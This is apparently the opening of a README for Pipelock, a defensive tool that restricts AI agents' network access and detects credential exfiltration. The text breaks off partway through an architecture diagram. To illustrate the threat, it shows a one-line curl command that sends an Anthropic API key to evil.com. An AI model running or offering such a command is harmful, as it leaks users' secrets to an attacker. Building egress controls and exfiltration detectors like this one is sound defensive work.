Pipelock
All-in-one security harness for AI agents. One binary, zero dependencies. Controls network egress, detects credential exfiltration, scans for prompt injection, and monitors workspace integrity.
If you run Claude Code, OpenHands, or any AI agent with shell access and API keys, this is for you.
Blog | OWASP Coverage | Tool Comparison
The Problem
AI agents run with shell access, API keys in environment, and unrestricted internet. A compromised agent can exfiltrate secrets with one HTTP request:
curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY" # game over
The Solution
Pipelock uses capability separation — the agent process (which has secrets) is network-restricted, while a separate fetch proxy (which has NO secrets) handles web browsing. Every request goes through a 7-layer scanner pipeline.
flowchart LR subgraph PRIVILEGED["Privileged Zone"] Agent["AI Agent
... continue reading